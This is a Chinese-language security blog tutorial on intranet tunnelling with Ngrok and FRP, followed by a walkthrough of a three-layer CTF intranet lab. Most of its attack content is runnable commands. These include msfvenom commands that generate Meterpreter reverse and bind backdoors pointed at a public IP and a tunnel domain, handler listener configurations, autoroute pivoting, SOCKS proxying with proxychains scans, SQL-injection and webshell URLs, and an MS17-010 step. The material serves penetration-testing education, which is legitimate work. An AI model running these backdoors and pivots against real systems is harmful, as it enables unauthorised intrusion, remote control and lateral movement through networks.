1.内网安全代理技术
作者:互联网
0x01.基础知识
1.内外网简单知识
常见的内网地址:
10.x.x.x
172.16.x.x---172.31.x.x
192.168.x.x
2.内网 1 和内网 2 通信问题
老王的个人电脑 (连接自己家wifi)
老李的个人电脑 (连接自己家wifi)
这个时候通过代理 , 让两个电脑的连接
3.正向反向协议通信连接问题
正向 : 对方有一个唯一的公网地址 , 你能够找到他
反向 : 对方只要能够出网 , 然后你有一个公网地址 , 他能找到你
4.内网穿透代理隧道技术说明
代理 : 解决的是网络通信问题
隧道 : 解决的是流量分析工具 , 流量检测工具 , 和防火墙相关过滤问题
两个功能是不一样的
0x02.内网穿透Ngrok
测试演示-两个内网通讯上线
实验环境:两个不同的内网(有网络)实现穿透控制
1.注册-购买-填写-确认 http://www.ngrok.cc/
协议:http 本地端口:127.0.0.1:80
下载客户端
记住你的隧道域名后面会用到 http://xxxxxxxxxxxx 和 隧道id xxsjdbswqdwe11324nsj
2.测试:内网 1 执行后门-免费主机处理-内网 2 监听-内网 2 接受器
./sunny clientid aa0676878c162ffc
3.msf生成后门
msfvenom -p windows/meterpreter/reverse_http lhost=xiaodisec.free.idcfengye.com lport=80 -f exe -o
test.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.76.132
set lport 4444
exploit
简单理解 : 你可以理解成在两个电脑之间搞了中介 , 中介负责传递你们之间传递的数据
0x03.内网穿透 Frp
自行搭建,方便修改,成本低,使用多样化,适合高富帅及隐私哥哥们
1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)
服务器修改配置文件 frps.ini:
[common]
bind_port = 6677
启动服务端:
./frps -c ./frps.ini
2.控制端-下载-解压-修改-启动
控制端修改配置文件 frpc.ini:
[common]
server_addr = 你的云主机 ip
server_port = 6677 #frpc 工作端口,必须和上面 frps 保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 #转发给本机的 5555
remote_port = 6000 #服务端用 6000 端口转发给本机
启动客户端:
./frpc -c ./frpc.ini
msf生成后门测试
msfvenom -p windows/meterpreter/reverse_tcp lhost=101.37.160.211 lport=6000 -f exe -o mm.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555
exploit
3.靶机运行 mm.exe 即可
0x04.CFS三层内网漫游安全测试演练
来源 2019 某 CTF 线下赛真题内网结合 WEB 攻防题库,涉及 WEB 攻击,内网代理路由等技术,每台
服务器存在一个 Flag,获取每一个 Flag 对应一个积分,获取三个 Flag 结尾。
别被吓到了 , 实际上很简单 , 就是通过1攻击2, 2再攻击3
1.Target1
探针目标-利用 WEB 漏洞(TP5_RCE)-获取 webshell 权限-获取 Flag-Target2
1.生成后门:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.76.132 LPORT=1111 -f elf >t1.elf
2.接受反弹:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.76.132
set LPORT 1111
exploit
3.信息收集及配置访问
获取网络接口:run get_local_subnets # 返回当前机器的所有网卡
查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.22.0/24 # 目标的网段 , 这样就可以和22段通信了 , 但是当前只有msf会话可以访问
开启本地代理:
use auxiliary/server/socks4a
set srvport 2222
exploit
4.利用本地代理接口访问测试
设置浏览器代理进行访问测试
linux:
配置 proxychains 后调用工具探针 Target2
/etc/proxychains.conf
socks4 192.168.76.132 2222
proxychains4 nmap -sT -Pn 192.168.22.0/24 -p80
-Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护。
-sT:扫描 TCP 数据包已建立的连接 connect
windows:
利用代理工具 Proxifier 或 SocksCap64 载入代理进行进程访问测试
2.Target2
探针目标-利用 WEB 漏洞(SQL 注入)-后台获取 webshell 权限-获取 Flag-Target3
http://192.168.22.128/index.php?r=vul&keyword=1 #sql 注入
http://192.168.22.128/index.php?r=admini/public/login #后台
http://192.168.22.128/index.php?r=special #后门 shell
1.生成正向后门:
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf
2.访问接受:
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.128
set LPORT 3333
exploit
受害主机执行t2.elf就可以拿到会话了
3.信息收集及配置访问
获取网络接口:run get_local_subnets
查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.33.0/24
3.Target3
traget3上面有ms-17-010漏洞 , 但是你要设置payload为正向连接 , 设置RHOST为目标主机地址 , 因为他不能反向连接你然后 run 就可以拿到会话了
标签:set,http,meterpreter,代理,192.168,安全,exploit,内网 来源: https://www.cnblogs.com/xcymn/p/15712530.html